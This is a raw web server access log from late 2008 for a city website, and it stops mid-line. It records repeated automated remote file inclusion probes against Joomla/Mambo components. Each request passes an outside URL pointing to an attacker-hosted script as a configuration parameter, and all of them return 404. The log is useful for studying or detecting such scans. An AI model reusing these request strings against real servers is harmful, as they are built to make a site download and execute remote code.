203.228.242.67 - - [30/Nov/2008:23:59:14 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.228.242.67 - - [01/Dec/2008:00:00:04 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
62.141.48.87 - - [01/Dec/2008:00:00:33 -0800] "GET /logs/access_071201.log//skin/zero_vote/error.php?dir=http://www.bodez.us/template/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
92.46.175.14 - - [01/Dec/2008:00:00:58 -0800] "GET /logs/access_080330.log//index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
92.46.175.14 - - [01/Dec/2008:00:00:58 -0800] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
92.46.175.14 - - [01/Dec/2008:00:00:58 -0800] "GET /logs//index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
62.141.48.87 - - [01/Dec/2008:00:01:11 -0800] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.bodez.us/template/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
92.46.175.14 - - [01/Dec/2008:00:01:22 -0800] "GET /logs/access_080401.log//index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
62.141.48.87 - - [01/Dec/2008:00:05:34 -0800] "GET /logs/access_071101.log//skin/zero_vote/error.php?dir=http://www.bodez.us/template/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
62.141.48.87 - - [01/Dec/2008:00:05:34 -0800] "GET /logs/access_080101.log//skin/zero_vote/error.php?dir=http://www.bodez.us/template/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.64.49.177 - - [01/Dec/2008:00:06:29 -0800] "GET /logs/access_080901.log//skin/zero_vote/error.php?dir=http://www.ccdomcol.com/crisannissa///.../.thumb/del.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [01/Dec/2008:00:07:27 -0800] "GET /logs/access_080401.log%20//index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://%20www.geocities.com/rafaelrado/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
82.146.59.116 - - [01/Dec/2008:00:08:57 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dalgakiran.su/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "cityofarkadelphia.com"
216.144.193.38 - - [01/Dec/2008:00:09:41 -0800] "GET /logs/access_080330.log//index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
216.144.193.38 - - [01/Dec/2008:00:09:41 -0800] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
216.144.193.38 - - [01/Dec/2008:00:09:41 -0800] "GET /logs//index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
69.65.42.208 - - [01/Dec/2008:00:11:03 -0800] "GET /%22com_comprofiler%22http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "cityofarkadelphia.com"
69.65.42.208 - - [01/Dec/2008:00:11:03 -0800] "GET /logs/access.log/%22com_comprofiler%22http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "cityofarkadelphia.com"
69.65.42.208 - - [01/Dec/2008:00:11:03 -0800] "GET /logs/%22com_comprofiler%22http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "cityofarkadelphia.com"
89.218.85.18 - - [01/Dec/2008:00:11:20 -0800] "GET /%22com_zoom%22http://%20www.geocities.com/rafaelrado/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [01/Dec/2008:00:11:20 -0800] "GET /logs/%22com_zoom%22http://%20www.geocities.com/rafaelrado/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.65.42.208 - - [01/Dec/2008:00:11:21 -0800] "GET /logs/access_081031.log/%22com_comprofiler%22http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "li